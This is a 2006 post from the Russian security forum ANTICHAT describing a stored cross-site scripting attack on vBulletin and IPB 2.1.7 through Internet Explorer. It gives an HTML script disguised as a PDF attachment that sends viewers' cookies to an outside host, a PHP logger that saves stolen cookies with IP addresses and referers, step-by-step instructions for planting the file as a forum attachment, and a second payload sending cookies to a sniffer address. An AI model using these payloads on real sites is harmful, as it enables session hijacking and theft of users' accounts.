Форум АНТИЧАТ - XSS vbulletin and IPB v2.1.7 With IE

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

XSS vbulletin and IPB v2.1.7 With IE

06.08.2006, 10:42

liauliau

Новичок

Регистрация: 09.04.2005

Сообщений: 29

Провел на форуме:
438995

Репутация: 17

XSS vbulletin and IPB v2.1.7 With IE

XSS vbulletin and IPB v2.1.7 With IE

test:<html><script> alert("hello");</script></html>

-----------------------------------------------------------------

test.pdf
------

Код:

<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>

c.php
-----

Код:

<?php 
 $cookie = $_GET['c']; 
 $ip = getenv ('REMOTE_ADDR'); 
 $date=date("m/d/Y g:i:s a"); 
 $referer= getenv ('HTTP_REFERER'); 
 $fl = fopen('log.txt', 'a'); 
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n"); 
 fclose($fl); 
?>

1_ Пишут test.pdf и c.php
2_ Помещенный c.php на webserver.
3_ Изменяют(Заменяют) url в test.pdf.
4_ Делают пост с test.pdf как attachement.
5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt

Лог сниффера

Код:

<html>
<script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</html>

Последний раз редактировалось liauliau; 06.08.2006 в 10:48..